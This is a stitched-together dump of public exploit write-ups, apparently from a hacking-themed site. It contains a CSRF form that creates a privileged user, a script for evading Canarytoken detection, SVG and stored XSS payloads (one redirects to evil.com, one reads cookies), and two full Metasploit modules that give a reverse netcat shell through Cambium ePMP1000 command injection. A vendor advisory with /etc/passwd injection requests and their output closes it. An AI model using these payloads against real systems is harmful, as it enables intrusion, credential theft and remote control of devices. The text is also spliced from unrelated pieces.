          <input type="hidden" name="lastName" value="User" />
          <input type="hidden" name="email" value="test&#64;test&#46;com" />
          <input type="hidden" name="username" value="Test" />
          <input type="hidden" name="password" value="password" />
          <input type="hidden" name="retypePassword" value="password" />
          <input type="hidden" name="roleid" value="2" />
          <input type="hidden" name="accessLevel" value="500" />
          <input type="hidden" name="submit" value="Add&#32;User" />
          <input type="submit" value="Submit request" />
        </form>
      </body>
    </html>
HireHackking 
## Exploit Title: Canarytokens 2019-03-01 - Detection Bypass
# Date: 20.03.2019
# Exploit Author: Benjamin Zink Loft, Gionathan "John" Reale 
# Vendor Homepage: https://thinkst.com/
# Version: up to 2019-03-01
# Software Link: https://github.com/thinkst/canarytokens
# Google Dork: N/A 
# CVE: 2019-9768 
#==================================================================================================================================================================================
# PoC:
#
#
#
# Requires unzip:
#
# sudo apt-get install unzip
#
#


<?php
 
system('unzip ' . $argv[1] . '.docx');
 
system('cp ' . $argv[1] . '.docx ./docProps/' . $argv[1] . '.docx && cd docProps');
 
$strFile = file_get_contents("docProps/core.xml");
 
if(strpos($strFile, 'AAAAAAAAAAAAAAAA')!=false && strpos($strFile, '2015-07-21')!=false && filesize( $argv[1] .".docx") < 170000 )
{
     echo "This file probably contains a CanaryToken! Open it with Libreoffice/Microsoft Word Protected View to bypass detection";
}
else
{
     echo "Should be safe to open normally";
}
?>
HireHackking 
# Exploit Title: Online Matrimonial Website System v3.3 - Code Execution via malicious SVG file upload
# Date: 3-8-2023
# Category: Web Application
# Exploit Author: Rajdip Dey Sarkar
# Version: 3.3
# Tested on: Windows/Kali
# CVE: CVE-2023-39115



Description:
----------------

An arbitrary file upload vulnerability in Campcodes Online Matrimonial
Website System Script v3.3 allows attackers to execute arbitrary code via
uploading a crafted SVG file.


SVG Payload
------------------

<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "
http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">

<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
   <polygon id="triangle" points="0,0 0,50 50,0" fill="#009900"
stroke="#004400"/>
   <script type="text/javascript">
      alert("You have been hacked!!")


      window.location.href="https://evil.com"
   </script>
</svg>


Steps to reproduce
--------------------------

 -Login with your creds
 -Navigate to this directory - /profile-settings
 -Click on Gallery -> Add New Image -> Browser -> Add Files
 -Choose the SVG file and upload done
 -Click the image!! Payload Triggered


Burp Request
-------------------

POST /Matrimonial%20Script/install/aiz-uploader/upload HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0)
Gecko/20100101 Firefox/115.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
X-CSRF-TOKEN: I5gqfipOOKWwI74hfdtFC2kpUP0EggWb8Qf7Xd5E
Content-Type: multipart/form-data;
boundary=---------------------------167707198418121100152548123485
Content-Length: 1044
Origin: http://localhost
Connection: close
Referer: http://localhost/Matrimonial%20Script/install/gallery-image/create
Cookie: _session=5GnMKaOhppEZivuzZJFXQLdldLMXecD1hmcEPWjg;
acceptCookies=true; XSRF-TOKEN=I5gqfipOOKWwI74hfdtFC2kpUP0EggWb8Qf7Xd5E
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin

-----------------------------167707198418121100152548123485
Content-Disposition: form-data; name="relativePath"

null
-----------------------------167707198418121100152548123485
Content-Disposition: form-data; name="name"

file (1).svg
-----------------------------167707198418121100152548123485
Content-Disposition: form-data; name="type"

image/svg+xml
-----------------------------167707198418121100152548123485
Content-Disposition: form-data; name="aiz_file"; filename="file (1).svg"
Content-Type: image/svg+xml

<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "
http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">

<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
   <polygon id="triangle" points="0,0 0,50 50,0" fill="#009900"
stroke="#004400"/>
   <script type="text/javascript">
      alert("You have been hacked!!")


      window.location.href="https://evil.com"
   </script>
</svg>
-----------------------------167707198418121100152548123485--
HireHackking 
# Exploit Title: Authenticated Persistent XSS in Cameleon CMS 2.7.4
# Google Dork: intext:"Camaleon CMS is a free and open-source tool and
a fexible content management system (CMS) based on Ruby on Rails"
# Date: 2023-10-05
# Exploit Author: Yasin Gergin
# Vendor Homepage: http://camaleon.tuzitio.com
# Software Link: https://github.com/owen2345/camaleon-cms
# Version: 2.7.4
# Tested on: Linux kali 6.1.0-kali7-amd64
# CVE : -

--- Description ---

http://127.0.0.1:3000/admin/login - Login as a Admin

Under Post tab click on "Create New"

While creating the post set Title as "><svg/onmouseover=alert(document.cookie)>

http://127.0.0.1:3000/admin/post_type/2/posts - Post data will be sent
to this url

-- POST DATA --

POST /admin/post_type/2/posts HTTP/1.1

Host: 127.0.0.1:3000
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101
Firefox/102.0
Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer: http://127.0.0.1:3000/admin/post_type/2/posts/new
Content-Type: application/x-www-form-urlencoded
Content-Length: 666
Origin: http://127.0.0.1:3000
Connection: keep-alive
Cookie:
_my_project_session=w4yj2Y%2FqHaXYDhwwBDnYsyQUc6AtLUnItJ3MGHBV1yS40xwTgjfvlBZVNgqKIvg1W58e0mxyW4OcBk0XwJRZ90j6SmCHG1KJG9ppBKk%2FdKGDboPCRBq40qKhHnkssRPCgRgIjs69EG7htSdUY%2Bbgit9XTESgvSusBBhsIED%2BLH0VBOBL6H%2FV4Mp59NEP7LhP%2FHmlulEa7I43J8HKpStDj2HiXxA5ZghvSkvpfQpN2d047jLhl71CUcW7pHxmJ4uAdY5ip5OTIhJG9TImps5TbIUrOHyE9vKp1LXzdmbNNi2GI5utUUsURLGUtaN7Fam3Kpi8IqEaBA%3D%3D--8ZKl2%2F6OzLCXn2qA--%2BtMhAwdbdfxNzoSPajkZrg%3D%3D;
auth_token=iRDUqXfbhmibLIM5mrHelQ&Mozilla%2F5.0+%28X11%3B+Linux+x86_64%3B+rv%3A102.0%29+Gecko%2F20100101+Firefox%2F102.0&127.0.0.1;
phpMyAdmin=4f5ad7484490645a49d171c03e15dab2; pma_lang=en
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1


authenticity_token=vuAzhnu6UocDR6zpeeaQxvlVjdmIMr9LPrLEcK5FGVAEYQamLHI1fAG7jBQ3FwEX_ACWedzoX72WAUxqj5wKrQ&post%5Bdraft_id%5D=&post%5Bslug%5D=svgonmouseoveralertdocumentcookie&meta%5Bslug%5D=svgonmouseoveralertdocumentcookie&post%5Btitle%5D=%22%3E%3Csvg%2Fonmouseover%3Dalert%28document.cookie%29%3E&post%5Bcontent%5D=%3Cp%3Eqwe%3C%2Fp%3E&meta%5Bsummary%5D=qwe&options%5Bseo_title%5D=&options%5Bkeywords%5D=&options%5Bseo_description%5D=&options%5Bseo_author%5D=&options%5Bseo_image%5D=&options%5Bseo_canonical%5D=&commit=Create&post%5Bstatus%5D=published&meta%5Btemplate%5D=&meta%5Bhas_comments%5D=0&meta%5Bhas_comments%5D=1&categories%5B%5D=6&tags=&meta%5Bthumb%5D=

-- POST DATA --

Then view the post you've created by clicking on "View Page" move your
mouse cursor onto post title. XSS will popup.
HireHackking 
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient

  def initialize(info = {})
    super(update_info(info,
      'Name' => "Cambium ePMP1000 'ping' Shell via Command Injection (up to v2.5)",
      'Description' => %{
          This module exploits an OS Command Injection vulnerability in Cambium
          ePMP1000 device management portal. It requires any one of the following login
          credentials - admin/admin, installer/installer, home/home - to set up a reverse
          netcat shell.
      },
      'License' => MSF_LICENSE,
      'Author' =>
        [
          'Karn Ganeshen <KarnGaneshen[at]gmail.com>'
        ],
      'References' =>
        [
          ['URL', 'http://ipositivesecurity.com/2015/11/28/cambium-epmp-1000-multiple-vulnerabilities/'],
          ['URL', 'https://support.cambiumnetworks.com/file/476262a0256fdd8be0e595e51f5112e0f9700f83']
        ],
      'Privileged' => true,
      'Targets' =>
        [
          ['EPMP',
            {
              'Arch' => ARCH_CMD,
              'Platform' => 'unix'
            }
          ]
        ],
      'DisclosureDate' => 'Nov 28 2015',
      'DefaultTarget'  => 0,
      'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/reverse_netcat' })
    )

    register_options(
      [
        Opt::RPORT(80),	# Application may run on a different port too. Change port accordingly.
        OptString.new('USERNAME', [true, 'A specific username to authenticate as', 'installer']),
        OptString.new('PASSWORD', [true, 'A specific password to authenticate with', 'installer'])
      ], self.class
    )

    deregister_options('DB_ALL_CREDS', 'DB_ALL_PASS', 'DB_ALL_USERS', 'USER_AS_PASS', 'USERPASS_FILE', 'USER_FILE', 'PASS_FILE', 'BLANK_PASSWORDS', 'BRUTEFORCE_SPEED', 'STOP_ON_SUCCESS')
  end

  #
  # Fingerprinting
  #
  def is_app_epmp1000?
    begin
      res = send_request_cgi(
        {
          'uri'       => '/',
          'method'    => 'GET'
        }
      )
    rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, ::Rex::ConnectionError
      print_error("#{rhost}:#{rport} - HTTP Connection Failed...")
      return false
    end

    good_response = (
      res &&
      res.code == 200 &&
      (res.body.include?('cambium.min.css') || res.body.include?('cambiumnetworks.com') && res.body.include?('https://support.cambiumnetworks.com/files/epmp/'))
    )

    if good_response
      get_epmp_ver = res.body.match(/"sw_version">([^<]*)/)
      if !get_epmp_ver.nil?
        epmp_ver = get_epmp_ver[1]
        if !epmp_ver.nil?
          print_good("#{rhost}:#{rport} - Running Cambium ePMP 1000 version #{epmp_ver}...")
          return true, epmp_ver
        else
          print_good("#{rhost}:#{rport} - Running Cambium ePMP 1000...")
          epmp_ver = ''
          return true, epmp_ver
        end
      end
    else
      print_error("#{rhost}:#{rport} - Application does not appear to be Cambium ePMP 1000. The target is not vulnerable.")
      epmp_ver = nil
      return false
    end
  end

  #
  # check
  #
  def check
    success, epmp_ver = is_app_epmp1000?
    if (success != 'false' && !epmp_ver.nil? && epmp_ver < '2.5')
      return CheckCode::Vulnerable
    else
      return CheckCode::Safe # Using 'Safe' here to imply this ver is not exploitable using ~the module~'
    end
  end

  #
  # Login
  #
  def login(user, pass)
    res = send_request_cgi(
      {
        'uri' => '/cgi-bin/luci',
        'method' => 'POST',
        'headers' => {
          'X-Requested-With' => 'XMLHttpRequest',
          'Accept' => 'application/json, text/javascript, */*; q=0.01'
        },
        'vars_post' =>
          {
            'username' => 'dashboard',
            'password' => ''
          }
      }
    )

    cookies = res.get_cookies_parsed
    check_sysauth = cookies.values.select { |v| v.to_s =~ /sysauth_/ }.first.to_s

    good_response = (
      res &&
      res.code == 200 &&
      check_sysauth.include?('sysauth')
    )

    if good_response
      sysauth_dirty = cookies.values.select { |v| v.to_s =~ /sysauth_/ }.first.to_s
      sysauth_value = sysauth_dirty.match(/((.*)[$ ])/)

      cookie1 = "#{sysauth_value}" + "globalParams=%7B%22dashboard%22%3A%7B%22refresh_rate%22%3A%225%22%7D%2C%22#{user}%22%3A%7B%22refresh_rate%22%3A%225%22%7D%7D"

      res = send_request_cgi(
        {
          'uri' => '/cgi-bin/luci',
          'method' => 'POST',
          'cookie' => cookie1,
          'headers' => {
            'X-Requested-With' => 'XMLHttpRequest',
            'Accept' => 'application/json, text/javascript, */*; q=0.01',
            'Connection' => 'close'
          },
          'vars_post' =>
            {
              'username' => user,
              'password' => pass
            }
        }
      )

      cookies = res.get_cookies_parsed

      good_response = (
        res &&
        res.code == 200 &&
        !res.body.include?('auth_failed')
      )

      if good_response
        print_good("SUCCESSFUL LOGIN - #{rhost}:#{rport} - #{user.inspect}:#{pass.inspect}")

        # check if max_user_number_reached?
        if !res.body.include?('max_user_number_reached')
        # get the final cookie now
          cookies = res.get_cookies_parsed
          stok_value = cookies.has_key?('stok') && cookies['stok'].first
          sysauth_dirty = cookies.values.select { |v| v.to_s =~ /sysauth_/ }.first.to_s
          sysauth_value = sysauth_dirty.match(/((.*)[$ ])/)

          final_cookie = "#{sysauth_value}" + "globalParams=%7B%22dashboard%22%3A%7B%22refresh_rate%22%3A%225%22%7D%2C%22#{user}%22%3A%7B%22refresh_rate%22%3A%225%22%7D%7D; userType=Installer; usernameType=installer; stok=" + stok_value

          # create config_uri
          config_uri_ping = '/cgi-bin/luci/;stok=' + stok_value + '/admin/ping'

          return final_cookie, config_uri_ping
        else
          print_error('The credentials are correct but maximum number of logged-in users reached. Try again later.')
          final_cookie = 'skip'
          config_uri_ping = 'skip'
          return final_cookie, config_uri_ping
        end
      else
        print_error("FAILED LOGIN - #{rhost}:#{rport} - #{user.inspect}:#{pass.inspect}")
        final_cookie = 'skip'
        config_uri_ping = 'skip'
        return final_cookie, config_uri_ping
      end
    end
  end

  #
  # open cmd_shell
  #
  def cmd_shell(config_uri, cookie)
    command = payload.encoded
    inject = '|' + "#{command}" + ' ||'
    clean_inject = CGI.unescapeHTML(inject.to_s)

    print_status('Sending payload...')

    res = send_request_cgi(
      {
        'method' => 'POST',
        'uri' => config_uri,
        'cookie' => cookie,
        'headers' => {
          'Accept' => '*/*',
          'Accept-Language' => 'en-US,en;q=0.5',
          'Content-Encoding' => 'application/x-www-form-urlencoded; charset=UTF-8',
          'X-Requested-With' => 'XMLHttpRequest',
          'Connection' => 'close'
        },
        'vars_post' =>
          {
            'ping_ip' => '127.0.0.1', # This parameter can also be used for injection
            'packets_num' => clean_inject,
            'buf_size' => 0,
            'ttl' => 1,
            'debug' => '0'
          }
      }, 25
    )
    handler
  end

  # exploit

  def exploit
    success, epmp_ver = is_app_epmp1000?
    if epmp_ver < '2.5'
      cookie, config_uri_ping = login(datastore['USERNAME'], datastore['PASSWORD'])
      if cookie == 'skip' && config_uri_ping == 'skip'
        return
      else
        cmd_shell(config_uri_ping, cookie)
      end
    else
      print_error('This ePMP version is not vulnerable. Module will not continue.')
      return
    end
  end
end
HireHackking 
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient

  def initialize(info = {})
    super(update_info(info,
      'Name' => "Cambium ePMP1000 'get_chart' Shell via Command Injection (v3.1-3.5-RC7)",
      'Description' => %{
          This module exploits an OS Command Injection vulnerability in Cambium
          ePMP1000 device management portal. It requires any one of the following login
          credentials - admin/admin, installer/installer, home/home - to set up a reverse
          netcat shell. The module has been tested on versions 3.1-3.5-RC7.
      },
      'License' => MSF_LICENSE,
      'Author' =>
        [
          'Karn Ganeshen <KarnGaneshen[at]gmail.com>'
        ],
      'References' =>
        [
          ['CVE', '2017-5255'],
          ['URL', 'https://blog.rapid7.com/2017/12/19/r7-2017-25-cambium-epmp-and-cnpilot-multiple-vulnerabilities']
        ],
      'Privileged' => true,
      'Targets' =>
        [
          ['CMD',
            {
              'Arch' => ARCH_CMD,
              'Platform' => 'unix'
            }
          ]
        ],
      'DisclosureDate' => 'Dec 18 2017',
      'DefaultTarget'  => 0,
      'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/reverse_netcat' })
    )

    register_options(
      [
        Opt::RPORT(80),	# Application may run on a different port too. Change port accordingly.
        OptString.new('USERNAME', [true, 'A specific username to authenticate as', 'installer']),
        OptString.new('PASSWORD', [true, 'A specific password to authenticate with', 'installer'])
      ], self.class
    )

    deregister_options('DB_ALL_CREDS', 'DB_ALL_PASS', 'DB_ALL_USERS', 'USER_AS_PASS', 'USERPASS_FILE', 'USER_FILE', 'PASS_FILE', 'BLANK_PASSWORDS', 'BRUTEFORCE_SPEED', 'STOP_ON_SUCCESS')
  end

  #
  # Fingerprinting
  #
  def is_app_epmp1000?
    begin
      res = send_request_cgi(
        {
          'uri'       => '/',
          'method'    => 'GET'
        }
      )
    rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, ::Rex::ConnectionError
      print_error("#{rhost}:#{rport} - HTTP Connection Failed...")
      return false
    end

    good_response = (
      res &&
      res.code == 200 &&
      (res.body.include?('cambium.min.css') || res.body.include?('cambiumnetworks.com') && res.body.include?('https://support.cambiumnetworks.com/files/epmp/'))
    )

    if good_response
      get_epmp_ver = res.body.match(/"sw_version">([^<]*)/)
      if !get_epmp_ver.nil?
        epmp_ver = get_epmp_ver[1]
        if !epmp_ver.nil?
          print_good("#{rhost}:#{rport} - Running Cambium ePMP 1000 version #{epmp_ver}...")
          return true, epmp_ver
        else
          print_good("#{rhost}:#{rport} - Running Cambium ePMP 1000...")
          epmp_ver = ''
          return true, epmp_ver
        end
      end
    else
      print_error("#{rhost}:#{rport} - Application does not appear to be Cambium ePMP 1000. The target is not vulnerable.")
      epmp_ver = nil
      return false
    end
  end

  #
  # check
  #
  def check
    success, epmp_ver = is_app_epmp1000?
    if (success != 'false' && !epmp_ver.nil? && epmp_ver >= '3.1')
      return CheckCode::Vulnerable
    else
      return CheckCode::Safe # Using 'Safe' here to imply this ver is not exploitable using the module'
    end
  end

  #
  # Login
  #
  def login(user, pass)
    res = send_request_cgi(
      {
        'uri' => '/cgi-bin/luci',
        'method' => 'POST',
        'headers' => {
          'X-Requested-With' => 'XMLHttpRequest',
          'Accept' => 'application/json, text/javascript, */*; q=0.01'
        },
        'vars_post' =>
          {
            'username' => 'dashboard',
            'password' => ''
          }
      }
    )

    cookies = res.get_cookies_parsed
    check_sysauth = cookies.values.select { |v| v.to_s =~ /sysauth_/ }.first.to_s

    good_response = (
      res &&
      res.code == 200 &&
      check_sysauth.include?('sysauth')
    )

    if good_response
      sysauth_dirty = cookies.values.select { |v| v.to_s =~ /sysauth_/ }.first.to_s
      sysauth_value = sysauth_dirty.match(/((.*)[$ ])/)
      prevsessid = res.body.match(/((?:[a-z][a-z]*[0-9]+[a-z0-9]*))/)

      res = send_request_cgi(
        {
          'uri' => '/cgi-bin/luci',
          'method' => 'POST',
          'cookie' => sysauth_value,
          'headers' => {
            'X-Requested-With' => 'XMLHttpRequest',
            'Accept' => 'application/json, text/javascript, */*; q=0.01',
            'Connection' => 'close'
          },
          'vars_post' =>
            {
              'username' => user,
              'password' => pass,
              'prevsess' => prevsessid
            }
        }
      )

      good_response = (
        res &&
        res.code == 200 &&
        !res.body.include?('auth_failed')
      )

      if good_response
        print_good("SUCCESSFUL LOGIN - #{rhost}:#{rport} - #{user.inspect}:#{pass.inspect}")

        # check if max_user_number_reached?
        if !res.body.include?('max_user_number_reached')
          # get the cookie now
          cookies = res.get_cookies_parsed
          stok_value_dirty = res.body.match(/"stok": "(.*?)"/)
          stok_value = "#{stok_value_dirty}".split('"')[3]
          sysauth_dirty = cookies.values.select { |v| v.to_s =~ /sysauth_/ }.first.to_s
          sysauth_value = sysauth_dirty.match(/((.*)[$ ])/)

          final_cookie = "#{sysauth_value}" + 'usernameType_80=admin; stok_80=' + "#{stok_value}"

          # create config_uri
          config_uri_get_chart = '/cgi-bin/luci/;stok=' + "#{stok_value}" + '/admin/get_chart'
          return final_cookie, config_uri_get_chart
        else
          print_error('The credentials are correct but maximum number of logged-in users reached. Try again later.')
          final_cookie = 'skip'
          config_uri_dump_config = 'skip'
          config_uri_reset_pass = 'skip'
          config_uri_get_chart = 'skip'
          return final_cookie, config_uri_get_chart
        end
      else
        print_error("FAILED LOGIN - #{rhost}:#{rport} - #{user.inspect}:#{pass.inspect}")
        final_cookie = 'skip'
        config_uri_get_chart = 'skip'
        return final_cookie, config_uri_get_chart
      end
    end
  end

  #
  # open cmd_shell
  #
  def cmd_shell(config_uri, cookie)
    command = payload.encoded
    inject = '|' + "#{command}"
    clean_inject = CGI.unescapeHTML(inject.to_s)

    print_status('Sending payload...')

    res = send_request_cgi(
      {
        'method' => 'POST',
        'uri' => config_uri,
        'cookie' => cookie,
        'headers' => {
          'Accept' => '*/*',
          'Accept-Language' => 'en-US,en;q=0.5',
          'Content-Encoding' => 'application/x-www-form-urlencoded; charset=UTF-8',
          'X-Requested-With' => 'XMLHttpRequest',
          'Connection' => 'close'
        },
        'vars_post' =>
          {
            'measure' => 's', # This parameter can also be used for injection
            'timestamp' => clean_inject,
            'debug' => 0
          }
      }, 25
    )
    handler
  end

  # exploit

  def exploit
    _success, epmp_ver = is_app_epmp1000?
    if (epmp_ver < '3.1' || epmp_ver > '3.5' && epmp_ver != '3.5-RC7')
      print_error('This module is applicable to versions 3.1-3.5-RC7 only. Exiting now.')
      return
    else
      cookie, config_uri_get_chart = login(datastore['USERNAME'], datastore['PASSWORD'])
      if cookie == 'skip' && config_uri_get_chart == 'skip'
        return
      else
        cmd_shell(config_uri_get_chart, cookie)
      end
    end
  end
end
HireHackking 
*July 14, 2015: *First contacted Cambium

*July 14, 2015: *Initial vendor response

*July 16, 2015: *Vuln Details reported to Cambium

*July 31, 2015:* Followup on advisory and fix timelines

*August 03, 2015: *Vendor gives mid-Aug as fix (v2.5) release
timeline. Ceases communication.

*Nov 19, 2015: *Releasing vulnerability details & poc


*Versions affected*: < v2.5


.....

*CVE-IDs* - To be assigned.

.....


*Background *

http://www.cambiumnetworks.com/products/access/epmp-1000/



ePMP 1000
Wireless service providers and enterprises need reliable, high-quality
broadband connectivity that can be rapidly deployed and expanded. The
ePMP platform provides stable coverage across large service areas and
enhances your existing infrastructure.


*Deployed by:*


ION Telecom
Kayse Wireless
Vanilla Telecom
Traeger Park
EszakNet
Edera
Videon
COMeSER
Seattle, WA
Budapest Video Surveillance
Desktop
Silo Wireless
Rocket Broadband
Snavely Forest Products
KRK Sistemi
KAJA Komputer
Root Media


*Vulnerability Details*

*From Cambium Networks ePMP 1000 user / configuration guide:
*
ePMP 1000 has four (4) users -

- ADMINISTRATOR, who has full read and write permissions.
- INSTALLER, who has permissions to read and write parameters
applicable to unit installation and monitoring.
- HOME, who has permissions only to access pertinent information for
support purposes
- READONLY, who only has permissions to view the Monitor page.


.....

1. *OS Command Injection *

'admin' and 'installer' users have access to perform Ping and
Traceroute functions via GUI. No other user has this access.

Ping function accepts destination IP address value via 'ping_ip
parameter and uses three (3) other parameters - packets_num, buf_size
and ttl, to perform Ping.

Traceroute function accepts destination IP address via 'traceroute_ip'
parameter.

The application does not perform strict input validation for all these
parameters - ping_ip', packets_num, buf_size and ttl for Ping
function; and traceroute_ip for Traceroute function.

This allows an authenticated user - 'admin' or non-admin,
low-privileged 'installer' & ‘home’ users - to be able to inject
arbitrary system commands that gets executed by the host.

.....
*PING PoC *

.....
HTTP Request
.....

POST /cgi-bin/luci/;stok=<stok_value>/admin/ping HTTP/1.1
Host: <IP_address>
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:38.0)
Gecko/20100101 Firefox/38.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Referer: http://<IP_address>/
Cookie: sysauth=<sysauth_value>;
globalParams=%7B%22dashboard%22%3A%7B%22refresh_rate%22%3A%225%22%7D%2C%22installer%22%3A%7B%22refresh_rate%22%3A%225%22%7D%7D;
userType=Installer; usernameType=installer; stok=<stok_value>
DNT: 1
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

ping_ip=8.8.8.8|cat%20/etc/passwd%20||&packets_num=1&buf_size=1&ttl=1&debug=0

[
*or*

ping_ip=8.8.8.8&packets_num=1|cat%20/etc/passwd%20||&buf_size=1&ttl=1&debug=0
*or*

ping_ip=8.8.8.8&packets_num=1&buf_size=1|cat%20/etc/passwd%20||&ttl=1&debug=0
*or*

ping_ip=8.8.8.8&packets_num=1&buf_size=1&ttl=1|cat%20/etc/passwd%20||&debug=0
]


.....
HTTP Response
.....

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, max-age=0, must-revalidate,
post-check=0, pre-check=0
Cache-Control: no-cache
Status: 200 OK
Content-Type: text/plain
Expires: 0
Date: Sun, 18 Jan 1970 14:45:37 GMT
Server: Cambium HTTP Server

daemon:*:1:1:daemon:/var:/bin/false
ftp:*:55:55:ftp:/home/ftp:/bin/false
network:*:101:101:network:/var:/bin/false
admin:<password_hash>:1000:4:admin:/tmp:/usr/bin/clish
installer:<password_hash>:2000:100:installer:/tmp:/bin/false
home:<password_hash>:3000:100:home:/tmp:/bin/false
readonly:<password_hash>:4000:100:readonly:/tmp:/bin/false
dashboard:<password_hash>:5000:100:dashboard:/tmp:/bin/false
nobody:*:65534:65534:nobody:/var:/bin/false
root:<password_hash>:0:0:root:/root:/bin/ash


.....
*traceroute - PoC
*
.....
HTTP Request
.....

POST /cgi-bin/luci/;stok=<stok_value>/admin/traceroute HTTP/1.1
Host: <IP_address>
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:38.0)
Gecko/20100101 Firefox/38.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Referer: http://<IP_address>/
Cookie: sysauth=<sysauth_value>;
globalParams=%7B%22dashboard%22%3A%7B%22refresh_rate%22%3A%225%22%7D%2C%22installer%22%3A%7B%22refresh_rate%22%3A%225%22%7D%7D;
userType=Installer; usernameType=installer; stok=<stok_value>
DNT: 1
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

traceroute_ip=8.8.8.8|cat%20/etc/passwd%20||&fragm=0&trace_method=icmp_echo&display_ttl=0&verbose=0&debug=0

.....
HTTP Response
.....

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, max-age=0, must-revalidate,
post-check=0, pre-check=0
Cache-Control: no-cache
Status: 200 OK
Content-Type: text/plain
Expires: 0
Date: Sun, 18 Jan 1970 16:09:26 GMT
Server: Cambium HTTP Server

daemon:*:1:1:daemon:/var:/bin/false
ftp:*:55:55:ftp:/home/ftp:/bin/false
network:*:101:101:network:/var:/bin/false
admin:<password_hash>:1000:4:admin:/tmp:/usr/bin/clish
installer:<password_hash>:2000:100:installer:/tmp:/bin/false
home:<password_hash>:3000:100:home:/tmp:/bin/false
readonly:<password_hash>:4000:100:readonly:/tmp:/bin/false
dashboard:<password_hash>:5000:100:dashboard:/tmp:/bin/false
nobody:*:65534:65534:nobody:/var:/bin/false
root:<password_hash>:0:0:root:/root:/bin/ash


.....

2. *Weak Authorization Controls + privilege escalation*

'home' and 'readonly' users do not have access to Ping and Traceroute
functions via management portal. However, the application lacks strict
authorization controls, and we can still perform both these functions
by sending corresponding HTTP(S) requests directly, when logged in as
low-privileged, 'home' user.

When we combine this flaw with above described OS Command Injection
affecting ping and traceroute, it is possible for non-admin,
low-privileged, ‘home’ user to execute system level commands via
'ping' and 'traceroute' functions and dump password hashes easily and
/ or perform any system level functions.
*Note*: ‘readonly’ user cannot perform this. Only ‘home’ user can
exploit these.

.....
*Steps to attack -
*
a login as home user
b craft & send HTTP request for ping and traceroute functions

.....
Login - HTTP Request
..

POST /cgi-bin/luci HTTP/1.1
Host: <IP_address>
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:38.0)
Gecko/20100101 Firefox/38.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Referer: http://<IP_address>/
Cookie: sysauth=<sysauth_value>;
globalParams=%7B%22dashboard%22%3A%7B%22refresh_rate%22%3A%225%22%7D%2C%22installer%22%3A%7B%22refresh_rate%22%3A%225%22%7D%7D
DNT: 1
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

username=home&password=<password>


.....
Login - HTTP Response
..


HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, max-age=0, must-revalidate,
post-check=0, pre-check=0
Cache-Control: no-cache
Status: 200 OK
Set-Cookie: sysauth=<home-sysauth_value>;
path=/cgi-bin/luci/;stok=<home-stok-value>
Content-Type: application/json
Expires: 0
Date: Sun, 18 Jan 1970 16:40:50 GMT
Server: Cambium HTTP Server

{ "stok": <home-stok_value>", "certif_dir": "/tmp/new_certificates/",
"status_url": "/cgi-bin/luci/;stok=<home-stok_value>/admin/status }


..
*Sending HTTP request for Ping function
*
.....
HTTP Request
.....

POST /cgi-bin/luci/;stok=<home-stok_value>/admin/ping HTTP/1.1
Host: <IP_address>
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:38.0)
Gecko/20100101 Firefox/38.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Referer: http://<IP_address>/
Cookie: sysauth=<home-sysauth_value>;
globalParams=%7B%22dashboard%22%3A%7B%22refresh_rate%22%3A%225%22%7D%2C%22installer%22%3A%7B%22refresh_rate%22%3A%225%22%7D%7D;
userType=Home User; usernameType=home; stok=<home-stok_value>
DNT: 1
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

ping_ip=8.8.8.8|cat%20/etc/passwd%20||&packets_num=1&buf_size=1&ttl=1&debug=0

.....
HTTP Response
.....

HTTP/1.1 200 OK
